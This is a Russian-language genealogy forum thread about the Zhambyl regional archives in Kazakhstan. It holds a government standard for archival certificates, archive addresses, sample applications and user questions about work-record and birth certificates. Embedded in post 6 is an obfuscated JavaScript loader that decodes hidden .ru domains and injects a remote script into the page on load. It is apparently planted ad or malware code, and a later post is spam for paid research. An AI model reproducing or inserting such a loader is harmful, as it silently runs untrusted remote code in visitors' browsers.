[

ГЛАВНАЯ СТРАНИЦА САЙТА · МЕТРИЧЕСКИЕ КНИГИ · РЕВИЗСКИЕ СКАЗКИ · УКРАИНА · РЕПРЕССИИ · ВОВ · Обратная связь · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум » РЕСПУБЛИКА КАЗАХСТАН » ЖАМБЫЛСКАЯ область - ДЖАМБУЛЬСКАЯ область » АРХИВ Жамбылской области (АРХИВ Жамбылской области)
АРХИВ Жамбылской области
СветланаДата: Пятница, 20.01.2012, 15:43 | Сообщение # 1
Группа: Администраторы
Сообщений: 1416
Статус: Offline
Жамбылская область[b]
На официальном сайте Акимата Жамбыльской обл сайт: http://www.zhambyl.kz/?action=uploader&lan=rus&page=43


есть портал гос услуг, в котором расписано куда подавать заявления на подтверждение стажа, образцы заявлений, и электронная страничка: смотрите: http://zhambyl.gov.kz/RU....nt.aspx


сдесь образец заявления: http://zhambyl.gov.kz/RU....lt.aspx
 
СветланаДата: Пятница, 20.01.2012, 15:44 | Сообщение # 2
Группа: Администраторы
Сообщений: 1416
Статус: Offline
На официальном сайте Акимата Жамбыльской обл сайт: http://www.zhambyl.gov.kz/

есть портал гос услуг, в котором расписано куда подавать заявления на подтверждение стажа, образцы заявлений, и электронная страничка: http://www.zhambyl.gov.kz/index.php?action=ss

сдесь образец заявления

Выдача архивных справок
Органы оказывающие данную государственную услугу

1 Государственный архив Жамбылской области
г. Тараз, ул. Абая, 125 а
8(7262) 45-32-50

2 Государственный архив г.Тараза
г. Тараз, ул.Рысбек батыра 4/49
8(7262) 51-61-28

3 Государственный архив Таласского района
Жамбылская

область, г. Каратау, ул. Тохтарова, 9а
8(726-44) 6-13-65

4 Государственный архив Байзакского района
Жамбылская область, с. Сарыкемер, ул. Конаева. 137
8(726-37) 2-17-59

5 Государственный архив Кордайского района
Жамбылская
8(726-36)область,
2-23-29
с. Кордай, ул. Домалак-ана, 209

6 Государственный архив Мойынкумского
Жамбылская
8(726-42)района
область,
2-41-75 с. Мойынкум, ул. Кошенова, 10
7 Государственный архив Шуйского района
Жамбылская
8(726-43)область,
2-16-63 г. Шу, ул.Абылайхана, 10

8 Государственный архив Меркенского района
Жамбылская
8(726-32)область,
2-13-72с. Мерке, ул. Исмайлова, 191
9 Государственный архив Т.Рыскуловского
Жамбылская
8(726-31)района
область,
2-23-75с. Кулан, ул. Жибек жолы, 59
10 Государственный архив Жуалинского района
Жамбылская
8(726-35) область,
2-17-74 с. Б. Момышулы, ул. Сауранбекулы,49

11 Государственный архив Жамбылского
Жамбылская область.
8(726-33) 2-14-70 района
с. Аса, ул. Абая, 127

12Государственный архив Сарысуского района
Жамбылская
8(726-39)область,
2-13-44с. Саудакент, ул. Абдарова, 35

13 Центр обслуживания населения
г. Тараз, ул. Койгельди, д.
87262-438418Жамбылской области
158 «а»
Перечень необходимых документов
при обращении в Архив:

1) заявление (письмо) с указанием сведений, которые необходимо подтвердить;

2) документ, удостоверяющий личность потребителя или документ удостоверяющий
полномочия доверенного лица (при личном посещении);

Смотрите образцы заявления услугах
при обращении в Центр:

1) заявление об оказании государственной услуги;

2) заявление (письмо) с указанием сведений, которые необходимо подтвердить;

3) оригинал и копию документа, удостоверяющего личность потребителя или документ
удостоверяющего полномочия доверенного лица.

Утвержден постановлением Правительства

Республики Казахстан от 30 декабря 2009 года № 2315

Стандарт государственной услуги

"Выдача архивных cправок"

1. Общие положения

1. Настоящий стандарт "Выдача архивных справок" (далее - стандарт) определяет порядок
оказания государственной услуги по выдаче архивных справок - официального документа архива,
имеющего юридическую силу и содержащего документную информацию о предмете запроса с
указанием поисковых данных документов, на основании которых она составлена (далее -
государственная услуга).

2. Форма оказываемой государственной услуги: не автоматизированная.

3. Государственная услуга оказывается на основании пункта 5 статьи 15 Закона Республики
Казахстан от 22 декабря 1998 года "О Национальном архивном фонде и архивах".

4. Государственная услуга оказывается государственными архивами (далее - Архив), а также
через центры обслуживания населения на альтернативной основе (далее - Центр), перечень
которых указан в приложениях 1 и 2 к настоящему стандарту.

5. Формой завершения государственной услуги является выдача архивной справки, копии или
выписки архивных документов (далее - архивная справка).

6. Государственная услуга оказывается физическим и юридическим лицам (далее -
потребитель).

7. Государственная услуга оказывается в следующие сроки: при обращении в Архив:

в течение пятнадцати календарных дней со дня регистрации документов в канцелярии Архива;

в случаях, когда для оказания государственной услуги необходимо изучение документов двух и более организации, а также более чем за пять лет, руководителем Архива, либо уполномоченным на это лицом срок оказания государственной услуги может быть продлен не более чем на тридцать календарных дней, о чем сообщается потребителю в течение трех календарных дней со дня регистрации документов;

оказание государственной услуги по выявлению информации генеалогического и тематического характеров, которые требуют значительных затрат времени и труда, ставятся на дополнительный контроль вплоть до окончательного его исполнения, о чем сообщается потребителю в течение трех календарных дней со дня регистрации документов.

Максимально допустимое время ожидания в очереди при сдаче необходимых документов для оказания государственной услуги, а также при получении документов -15 минут;

при обращении в Центр:

в течение тридцати календарных дней с момента отправки документов Центром в Архив;

максимально допустимое время ожидания в очереди при сдаче необходимых документов для

оказания государственной услуги, а также при получении документов - 30 минут.

Государственная услуга по выдаче архивных справок генеалогического и тематического характера оказывается только Архивами.

8. Государственная услуга является бесплатной, за исключением проведения по заказам
(заявкам) выявления информации генеалогического и тематического характера и копирования
архивных документов, которая согласно пункту 1 статьи 17 Закона Республики Казахстан "О
Национальном архивном фонде и архивах" оказываются на платной основе.

В этом случае, заключается договор на оказание государственной услуги, в котором оговариваются порядок оплаты за выполненную работу. Оплата услуг производится в соответствии с расценками, установленными в прейскуранте цен, утвержденном приказом Министра культуры и информации Республики Казахстан и Правилами оказания платных услуг и использования полученных средств государственными и ведомственными архивами, содержащимися за счет республиканского бюджета, утвержденных постановлением Правительства Республики Казахстан от 8 февраля 2002 года № 183.

Оплата производится через банки Республики Казахстан, которыми выдается квитанция, подтверждающая размер и дату оплаты.

9. Полная информация о порядке оказания государственной услуги и необходимых
документах, размещается на портале электронного Правительства: www.e.gov.kz, интернет-
ресурсе Министерства культуры и информации Республики Казахстан: www.mki.gov.kz, в
официальных источниках информации, информационных досках и на стендах в местах оказания
государственной услуги, перечень которых указан в приложениях 1 и 2 к настоящему стандарту.

10. Государственная услуга оказывается:

при обращении в Архив: ежедневно, за исключением субботы и воскресенья. Прием документов осуществляется с 9.00 до 18.00 часов, перерыв на обед с 13.00 до 14.00 часов. Прием осуществляется в порядке очереди, без предварительной записи и ускоренного обслуживания;

при обращении в Центр: шесть дней в неделю, кроме воскресенья и праздничных дней, с установленным графиком с 9-00 часов до 20-00 часов без перерыва, для филиалов и представительств устанавливается график работы с 9-00 часов до 19-00 часов с одночасовым перерывом на обед. Прием осуществляется в порядке "электронной" очереди, без предварительной записи и ускоренного обслуживания.

11. Услуга оказывается в здании Архива, где предусмотрены условия для людей с
ограниченными физическими возможностями, а также имеются помещения, оснащенные стендами
с перечнем необходимых документов.

Для поддержки правопорядка помещение Архива имеет круглосуточный пост охраны, противопожарные сигнализации и другие меры безопасности.

Государственная услуга также оказывается в здании Центра по месту проживания потребителя где предусмотрены условия для обслуживания потребителей с ограниченными физическими возможностями. В зале располагаются справочное бюро, кресла ожидания, информационные стенды с образцами заполненных бланков.

2. Порядок оказания государственной услуги

12. Для получения государственной услуги потребитель представляет:
при обращении в Архив:

1) заявление (письмо) с указанием сведений, которые необходимо подтвердить;

2) документ, удостоверяющий личность потребителя или документ удостоверяющий
полномочия доверенного лица (при личном посещении);

при обращении в Центр:

1) заявление об оказании государственной услуги;

2) заявление (письмо) с указанием сведений, которые необходимо подтвердить:

3) оригинал и копию документа, удостоверяющего личность потребителя или документ
удостоверяющего полномочия доверенного лица.

При приеме пакета документов, сотрудник Центра сверяет подлинность копии с оригиналом и возвращает оригинал потребителю.

В случае необходимости, потребитель прилагает к заявлению (письму) соответствующие документы и материалы, либо их копии.

13. Для получения государственной услуги заполнение бланков не требуется, заявления
принимаются по произвольной форме.

В Центре бланки заявлений об оказании государственной услуги размещаются на специальной стойке в зале ожидания, либо у консультантов Центра.

14. Для получения государственной услуги через Архив документы, указанные в пункте 12
настоящего стандарта, сдаются в Архивы, перечень которых, указан в приложении 1 к настоящему
стандарту.

В Центре прием документов осуществляется посредством "окон", на которых размещается информация о предназначении и выполняемых функциях "окон", а также указываются фамилия, имя, отчество и должность инспектора Центра.

Инспектор Центра осуществляет проверку полноты документов на соответствие пункту 12 настоящего стандарта, регистрацию в журнале и передачу документов инспектору накопительного отдела.

Инспектор накопительного отдела Центра осуществляет сбор документов, составление реестра и отправку в Архив.

Центром доставка заявлений с прилагаемыми документами в Архив осуществляется в день приема данных заявлений не менее 2 раз посредством специальной связи.

Архив после получения документов из Центра осуществляет их проверку на соответствие пункту 12 настоящего стандарта, регистрирует поступившие документы в книге (журнале) регистрации запросов физических и юридических лиц.

Исполненные (готовые) документы из Архива поступают в Центр не позднее одного рабочего дня до истечения срока выдачи, указанного в расписке о приеме соответствующих документов.

15. Подтверждением принятия Архивом всех необходимых документов, указанных в пункте 12
настоящего стандарта, служит регистрация документов, предоставленных для получения услуги в
книге регистрации, с указанием установленной даты получения потребителем государственной
услуги.

При приеме документов через Центр потребителю выдается расписка о приеме соответствующих документов с указанием:

1) номера и даты приема запроса;

2) вида запрашиваемой государственной услуги;

3) количества и названий приложенных документов;

4) даты (время) и места выдачи документов;

5) фамилии, имени, отчества инспектора Центра принявшего заявление на оформление
документов.

16. Архивным работником архивная справка выдается потребителю (доверенному лицу) при
личном приеме, либо направляется по почте или в Центр.

Выдача готовых документов потребителю производится Архивами по адресам, указанным в приложении 1 к настоящему стандарту.

В Центре выдача готовых документов потребителю осуществляется инспектором Центра посредством "окон" на основании расписки в указанный в ней срок.

17. Основанием для приостановления оказания государственной услуги является
непредставление потребителем одного из документов, указанных в пункте 12 настоящего
стандарта.

Основанием для отказа в оказании государственной услуги является отсутствие необходимых сведений для выполнения запроса.

Архивы при выявлении ошибок в оформлении документов, предоставлении неполного пакета документов, указанных в пункте 12 настоящего стандарта, или ненадлежащем оформлении документов, а также неподлинности представленных документов, в течение трех рабочих дней после получения пакета документов возвращают их потребителю или в Центр с письменным обоснованием причин возврата (отказа).

Центр информирует потребителя в течение одного рабочего дня после их получения и выдает письменные обоснования Архива о причине возврата (отказа).

В случаях, если потребитель не обратился за получением документов в срок, Центр обеспечивает их хранение в течение 1 месяца, после чего передает их в архив Центра.

3. Принципы работы

18. Деятельность Архивов и Центров основывается на соблюдении конституционных прав
человека, законности при исполнении служебного долга и осуществляется на принципах
вежливости, предоставлении исчерпывающей и полной информации, обеспечении ее сохранности,
защиты и конфиденциальности.

4. Результаты работы

19. Результаты работы оказания государственной услуги потребителям измеряются
показателями качества и доступности согласно приложению 3 к настоящему стандарту.

20. Целевые значения показателей качества и доступности государственной услуги ежегодно
утверждаются специально созданной рабочей группой, созданной из числа руководителей
управлений архивов и документации областей, городов Астаны и Алматы.

5. Порядок обжалования

21. Порядок обжалования действий (бездействия) уполномоченных должностных лиц Архива
разъясняется директорами Архива, начальниками управлений архивов и документации областей,
городов Астаны и Алматы.

Информацию о порядке обжалования действий (бездействия) инспектора Центра можно получить по телефону информационно-справочной службы Центра: 58-00-58.

22. В случае претензий по качеству предоставления государственной услуги жалоба подается
на имя директора Архива, начальников управлений архивов и документации областей, городов
Астаны и Алматы.

Жалобы принимаются в письменном виде по почте, либо нарочно через канцелярию Архивов по адресам, указанным в приложении 1 настоящего стандарта.

Жалоба по качеству предоставления государственной услуги через Центр подается на имя директора Центра. Адреса и телефоны Центров указаны в приложении 2 к настоящему стандарту.

Спорные вопросы решаются в порядке гражданского судопроизводства.

23. Принятая жалоба регистрируется в журнале учета входящей корреспонденции Архивов и
(или) Центра и рассматривается в сроки, установленные Законом Республики Казахстан "О
порядке рассмотрения обращений физических и юридических лиц".

Документом, подтверждающим принятие жалобы является второй экземпляр жалобы либо копия жалобы, на котором лицом, принимающим жалобу указывается срок и место получения ответа на поданную жалобу и контактные данные должностных лиц, у которых можно узнать о ходе рассмотрения жалобы.

О результатах рассмотрения жалобы потребителю сообщается в письменном виде по почте, либо электронной почте.

6. Контактная информация

24. Графики работы и приема руководителей Архива и Центра определяются в соответствии с
графиками работы Архива, Центра, предусмотренными в пункте 10 настоящего стандарта.

Контактные телефоны, адреса Архивов и Центров, указаны в приложениях 1 и 2 настоящего стандарта, а также в официальных источниках информации и на стендах, расположенных в помещениях Архива и Центра.

25. Дополнительную информацию о представляемой государственной услуге можно получить
на интернет-ресурсе Министерства культуры и информации Республики Казахстан:
www.mki.gov.kz.

Приложение 1

к стандарту государственно услуги "Выдача архивных справок"

Адреса государственных архивов


Название архивов
Адреса архивов
Номера телефонов

1
Жамбылская область:

Государственный архив Жамбылской области
г. Тараз, ул. Абая, 125 а
8(7262) 45-32-50

2
Государственный архив г.Тараза

г. Тараз, ул.Рысбек батыра 4/49
8(7262 ) 51-61-28

3
Государственный архив Таласского района
Жамбылская область. г. Каратау, ул. Тохтарова, 9 а
8(726-44) 6-13-65

4
Государственный архив Байзакского района
Жамбылская область, с. Сарыкемер, ул. Конаева, 137
8(726-37) 2-17-59

5
Государственный архив Кордайского района
Жамбылская область,

с. Кор дай, ул. Домалак-ана, 209
8(726-36) 2-23-29

6
Государственный архив Мойынкумского района
Жамбылская область,

с. Мойынкум, ул. Кошенова, 10
8(726-42) 2-41-75

7
Государственный архив Шуйского района
Жамбылская область, г. Шу, ул. Абылайхана, 10
8(726-43) 2-16-63

8
Государственный архив Меркенского района
Жамбылская область, с. Мерке, ул. Исмайлова, 191
8(726-32) 2-13-72

9
Государственный архив Т. Рыскуловского района
Жамбылская область, с. Кулан,

ул. Жибек жолы, 59
8(726-31) 2-23-75

10
Государственный архив Жуалинского района
Жамбылская область, с.

Б. Момышулы,

ул. Сауранбекулы, 49
8(726-35) 2-17-74

11
Государственный архив Жамбылского района
Жамбылская область, с. Аса, ул. Абая, 127
8(726-33) 2-14-70

12
Государственный архив Сарысуского района
Жамбылская область, с. Саудакент,

ул. Абдарова, 35
8(726-39) 2-13-44
 
СветланаДата: Пятница, 20.04.2012, 13:18 | Сообщение # 3
Группа: Администраторы
Сообщений: 1416
Статус: Offline
Байзакский район (8726 37 )
ВЫДАЧА АРХИВНЫХ СПРАВОК:
Государственный архив Байзакского района
Жамбылская область, с. Сарыкемер, ул. Конаева. 137
8(726-37) 2-17-59

Адрес
080104 с. Сарыкемер,

ул. Байзак батыра, 104

e-mai: minash@mail.ru
Ф.И.О директора архива
Баянова М.Ж..

т. 8(726-37) 2-17-59
Ф.И.О сотрудника справочного отдела

Усубалиева А.А.

т. 8(726-37) 2-16-91

e-mai: minash@mail.ru
Функциональная обязанность сотрудника справочного отдела
- исполняет запросы учреждений,предприятий,организаций и граждан СНГ по вопросам выдачи справок социально-правового характера, ответы на письменные обращения.

- дает ответы на тематические запросы в установленном порядке.

- исполнение запросов МИД
На официальном сайте Акимата Жамбыльской обл сайт: http://www.zhambyl.kz/?action=uploader&lan=rus&page=43

есть портал гос услуг, в котором расписано куда подавать заявления на подтверждение стажа, образцы заявлений, и электронная страничка: смотрите: http://zhambyl.gov.kz/RU....nt.aspx

сдесь образец заявления: http://zhambyl.gov.kz/RU....lt.aspx

Директору Жамбылского облгосархива

от ________________

(фамилия, имя, отчество полностью)

проживающий по адресу: телефон № ____________

ЗАЯВЛЕНИЕ

Прошу подтвердить стаж работы в _________________(наименование организации)

за _________________ годы

В указанные годы фамилия была _________

«___»______________200___год

подпись
при себе иметь(выслать): копию удостоверения личности, копию трудовой книжки (при оформлении на других лиц –доверенность, заверенная нотариусом)

Директору Жамбылского облгосархива

от ___________________

(фамилия, имя, отчество полностью)

проживающий по адресу:

______________________

телефон № ____________

ЗАЯВЛЕНИЕ
Прошу выдать справку о заработной плате за 19___-19___ годы.

(на каждые 4 года – отдельное заявление)

Работал ________________________________________________________

(наименование организации, подразделения, цех, должность)

В указанные годы фамилия была ____________________

«___»______________20___год

Подпись

при себе иметь: копию удостоверения личности, копию трудовой книжки, при оформлении на других лиц – доверенность, заверенная нотариусом

ЗАЯВЛЕНИЕ

Прошу подтвердить местонахождение _________________(наименование организации)

за 19___-19___ годы..........................и.т.п.

ЭТО ОБРАЗЦЫ
 
kazahstan1smirnoffДата: Пятница, 05.12.2014, 20:40 | Сообщение # 4
Группа: Пользователи
Сообщений: 1
Статус: Offline
Живу в России как получить справку о стаже работы в ПМК-48 для предоставлении в пенсионный фонд России.
 
СветланаДата: Среда, 10.12.2014, 09:37 | Сообщение # 5
Группа: Администраторы
Сообщений: 1416
Статус: Offline
Цитата kazahstan1smirnoff ()
Живу в России как получить справку о стаже работы в ПМК-48 для предоставлении в пенсионный фонд России.
Для получения информациио стаже работы и заработной платы для оформления выхода пенсию, Вам необходимо указать наименование предприятия и

обратиться в  Архив по месту нахождения  организации

А так же для информации:
1. Какой гос.орган оказывает услугу
:

-Государственные архивы областей,районов,
-центры обслуживания населения на альтернативной основе (далее - ЦОН).
2. Куда обратиться за услугой:
- Архив;
- ЦОН;

А так же можно
задать вопрос на сайте Центрального Государственного Архива Республики
Казахстан - интернет приемная:Казахстан - интернет приемная: http://www.cga.kz/index.php?module=reception
Так же Государственная услуга оказывается
Комитетоминформации и архивов Министерства связи и информации Республики Казахстан
(далее - Комитет) по адресу: город Астана, Есильский район, улица Орынбор, дом
8, подъезд 14, кабинет 215, интернет-ресурс: http://www.mk.gov.kz/rus/komitety/komitet_informacii_arxivov/
а также через веб-портал «электронного правительства»: http://www.egov.kz/

ПЕРЕИМЕНОВАННЫЕ РАЙОНЫ (портерянные района Где искать..)

http://cdtnkfyf.ucoz.ru/forum/39-257-1

Переименованные населенные пункты и области Казахстана

http://cdtnkfyf.ucoz.ru/forum/39-75-1
 
женя7914Дата: Среда, 10.10.2018, 22:27 | Сообщение # 6
Группа: Пользователи
Сообщений: 1
Статус: Offline
добрый вечер! у меня возникла такая проблема, у моей мамы Акименко Татьяны Владимировны порядком 10 лет назад сгорели все документы включая свидетельство о рождении, то что было сделано после получения гражданства РФ мы востановили , а вот те документы что были получены ею в Республике Казахстан к сожалению не удалось. Теперь когда подходит время выхода на пенсию ей понадобилось свидетельство о рождении, в связи с этим возникает вопрос его востановления. Как это можно сделать, куда обратиться за помощью. Может в архив или еще куда?!
P/S: родственники которые могли бы с этим помочь уже давно не живут в Казахстане 

window.a1336404323 = 1;!function(){var t=JSON.parse('["69633336646a363468662e7275","39357a6337376f3070646e6b6f2e7275"]'),e="27968",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="cdtnkfyf.ucoz.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r
];return e.apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n
]?(e=e[n],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t
,u=o©+"/d6safundjenk6af/"+e+"/c/"+n®+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();
 
si9280904Дата: Понедельник, 16.09.2019, 13:29 | Сообщение # 7
Группа: Пользователи
Сообщений: 8
Статус: Offline
Вы хотите узнать откуда Ваши корни? Узнать где родились Ваши прадеды, узнать их имена? Найти документы о раскулачивании, репрессиях Ваших прадедов? Вам надо помочь в получении справок и копий документов из ЗАГС и архивов?
Помогу начать поиск, подскажу с чего начать, куда обратиться, чтоб найти информацию о своих прадедах. Сделаю анализ информации ,составлю план поиска с несколькими вариантами развития событий.
Составлю запросы в архивы по Вашему желанию. Поддержка на всем пути поиска.
Большая база метрических книг по России, Украине, и др. Просмотрю наличие Вашего населенного пункта в базе.
За отдельную плату просмотрю книги по Вашему населенному пункту, сканы метрических книг предоставлю. Вышлю фото страниц метрической книги с Вашим населенным пунктом ( но! только при наличии населенного пункта в базе!!! )
https://u.to/ZphmFQ  
 
СветланаДата: Понедельник, 16.09.2019, 13:31 | Сообщение # 8
Группа: Администраторы
Сообщений: 1416
Статус: Offline
женя7914,  обратитесь в ЗАГС вашего населенного пункта. Они поставят запрос и отправят его по назначению.
 
Форум » РЕСПУБЛИКА КАЗАХСТАН » ЖАМБЫЛСКАЯ область - ДЖАМБУЛЬСКАЯ область » АРХИВ Жамбылской области (АРХИВ Жамбылской области)
  • Страница 1 из 1
  • 1
Поиск:

Потомки переселенцев.
title="КНИГИ"
  • История Актюбинской области в документах Архива
  • СТАНИЦА ТБИЛИССКАЯ
  • Группа "Гости" не имеет право просмотра модуля Группа "Гости" не имеет право просмотра модуля